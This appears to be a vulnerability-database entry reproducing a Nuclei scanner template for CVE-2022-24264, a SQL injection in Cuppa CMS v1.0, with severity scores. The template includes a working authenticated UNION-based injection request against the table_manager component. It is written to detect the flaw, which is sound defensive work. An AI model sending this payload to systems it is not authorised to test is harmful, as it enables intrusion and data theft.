Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-24264
HistoryMay 06, 2023 - 12:12 p.m.

Cuppa CMS v1.0 - SQL injection

2023-05-0612:12:20
ProjectDiscovery
github.com
2
cve
sqli
cuppa
authenticated
cuppacms

CVSS2

7.8

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.092

Percentile

94.8%

Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
id: CVE-2022-24264

info:
  name: Cuppa CMS v1.0 - SQL injection
  author: theamanrawat
  severity: high
  description: |
    Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
  remediation: |
    Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24264
    - https://github.com/truonghuuphuc/CVE
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/Nguyen-Trung-Kien/CVE-1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-24264
    cwe-id: CWE-89
    epss-score: 0.11196
    epss-percentile: 0.95163
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cuppacms
    product: cuppacms
  tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms
variables:
  num: '999999999'

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        POST /components/table_manager/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        search_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(num)}}'
          - 'td_available_languages'
        condition: and

      - type: word
        part: header_2
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d88d07db99c01c0d38dde14e98bd996eafce5cbfa74ac0c636fae56d19b7f7d802204640ff05ee0f819994c2d9361295ff63f637d9cfb4d09b7d0ca22f1caa912046:922c64590222798bb761d5b6d8e72950

CVSS2

7.8

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.092

Percentile

94.8%

Related for NUCLEI:CVE-2022-24264